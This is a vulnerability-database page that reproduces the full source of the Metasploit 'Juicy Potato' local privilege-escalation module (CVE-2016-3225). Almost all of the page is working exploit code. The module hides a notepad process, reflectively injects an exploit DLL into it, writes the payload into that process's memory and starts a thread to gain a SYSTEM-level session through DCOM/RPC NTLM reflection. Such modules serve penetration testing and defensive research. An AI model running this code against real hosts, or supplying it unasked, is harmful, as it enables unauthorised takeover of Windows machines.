Lucene search
K

Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)

🗓️ 10 Jan 2019 16:20:43Reported by FoxGloveSec, breenmachine, decoder, ohpe, phra, lupmanType 
metasploit
 metasploit
🔗 www.rapid7.com👁 207 Views

Windows Net-NTLMv2 Reflection DCOM/RPC module for privilege escalatio

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GreatRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)',
          'Description' => %q{
            This module utilizes the Net-NTLMv2 reflection between DCOM/RPC
            to achieve a SYSTEM handle for elevation of privilege.
            It requires a CLSID string.
            Windows 10 after version 1803, (April 2018 update, build 17134) and all
            versions of Windows Server 2019 are not vulnerable.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'FoxGloveSec', # the original Potato exploit
            'breenmachine', # Rotten Potato NG!
            'decoder', # Lonely / Juicy Potato
            'ohpe', # Juicy Potato
            'phra', # MSF Module
            'lupman' # MSF Module
          ],
          'Arch' => [ARCH_X86, ARCH_X64],
          'Platform' => 'win',
          'SessionTypes' => ['meterpreter'],
          'DefaultOptions' => {
            'EXITFUNC' => 'none',
            'WfsDelay' => '20'
          },
          'Targets' => [
            ['Automatic', {}]
          ],
          'Payload' => {
            'DisableNops' => true
          },
          'References' => [
            ['MSB', 'MS16-075'],
            ['CVE', '2016-3225'],
            ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/'],
            ['URL', 'https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/'],
            ['URL', 'https://github.com/breenmachine/RottenPotatoNG'],
            ['URL', 'https://decoder.cloud/2017/12/23/the-lonely-potato/'],
            ['URL', 'https://ohpe.it/juicy-potato/']
          ],
          'DisclosureDate' => '2016-01-16',
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_sys_config_getenv
                stdapi_sys_config_getprivs
                stdapi_sys_config_sysinfo
                stdapi_sys_process_attach
                stdapi_sys_process_execute
                stdapi_sys_process_thread_create
              ]
            }
          }
        }
      )
    )

    register_options(
      [
        OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ])
      ]
    )

    register_advanced_options(
      [
        OptAddress.new('RpcServerHost', [ true, 'Set RPC server target host', '127.0.0.1' ]),
        OptPort.new('RpcServerPort', [ true, 'Set RPC server target port', 135 ]),
        OptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]),
        OptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]),
        OptString.new('LogFile', [ false, 'Set the log file' ])
      ]
    )
  end

  # Creates a temp notepad.exe to inject payload in to given the payload
  def create_temp_proc
    windir = client.sys.config.getenv('windir')
    # Select path of executable to run depending the architecture
    if sysinfo['Architecture'] == ARCH_X64 && client.arch == ARCH_X86 && @payload_arch.first == ARCH_X64
      cmd = "#{windir}\\Sysnative\\notepad.exe"
    elsif sysinfo['Architecture'] == ARCH_X64 && client.arch == ARCH_X64 && @payload_arch.first == ARCH_X86
      cmd = "#{windir}\\SysWOW64\\notepad.exe"
    else
      cmd = "#{windir}\\System32\\notepad.exe"
    end
    begin
      proc = client.sys.process.execute(cmd, nil, { 'Hidden' => true })
    rescue Rex::Post::Meterpreter::RequestError
      return nil
    end

    return proc
  end

  def create_temp_proc_stage2
    windir = client.sys.config.getenv('windir')
    # Select path of executable to run depending the architecture
    if sysinfo['Architecture'] == ARCH_X64 && @payload_arch.first == ARCH_X86
      cmd = "#{windir}\\SysWOW64\\notepad.exe"
    else
      cmd = "#{windir}\\System32\\notepad.exe"
    end
    return cmd
  end

  def check
    privs = client.sys.config.getprivs
    # Fast fails
    if !privs.include?('SeImpersonatePrivilege')
      print_bad('Target session is missing the SeImpersonatePrivilege.')
      return Exploit::CheckCode::Safe
    end
    version = get_version_info
    unless version.build_number.between?(Msf::WindowsVersion::Server2008_R2_SP0, Msf::WindowsVersion::Win10_1803)
      print_bad("System not vulnerable (#{version.product_name})")
      return Exploit::CheckCode::Safe
    end
    print_good("Target appears to be vulnerable (#{version.product_name})")
    return Exploit::CheckCode::Appears
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end
    @payload_name = datastore['PAYLOAD']
    @payload_arch = framework.payloads.create(@payload_name).arch
    if check == Exploit::CheckCode::Safe
      fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege, or OS not exploitable')
    end
    if @payload_arch.first == ARCH_X64
      dll_file_name = 'juicypotato.x64.dll'
      vprint_status('Assigning payload juicypotato.x64.dll')
    elsif @payload_arch.first == ARCH_X86
      dll_file_name = 'juicypotato.x86.dll'
      vprint_status('Assigning payload juicypotato.x86.dll')
    else
      fail_with(Failure::BadConfig, 'Unknown target arch; unable to assign exploit code')
    end
    print_status('Launching notepad to host the exploit...')
    notepad_process = create_temp_proc
    cmd = create_temp_proc_stage2
    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      print_error('Operation failed. Trying to elevate the current process...')
      process = client.sys.process.open
    end
    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'juicypotato', dll_file_name)
    library_path = ::File.expand_path(library_path)
    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)
    print_status("Exploit injected. Injecting exploit configuration into #{process.pid}...")
    configuration = "#{datastore['LogFile']}\x00"
    configuration += "#{cmd}\x00"
    configuration += "#{datastore['CLSID']}\x00"
    configuration += "#{datastore['ListeningPort']}\x00"
    configuration += "#{datastore['RpcServerHost']}\x00"
    configuration += "#{datastore['RpcServerPort']}\x00"
    configuration += "#{datastore['ListeningAddress']}\x00"
    configuration += "#{payload.encoded.length}\x00"
    configuration += payload.encoded
    payload_mem = inject_into_process(process, configuration)
    # invoke the exploit, passing in the address of the payload that
    # we want invoked on successful exploitation.
    print_status('Configuration injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation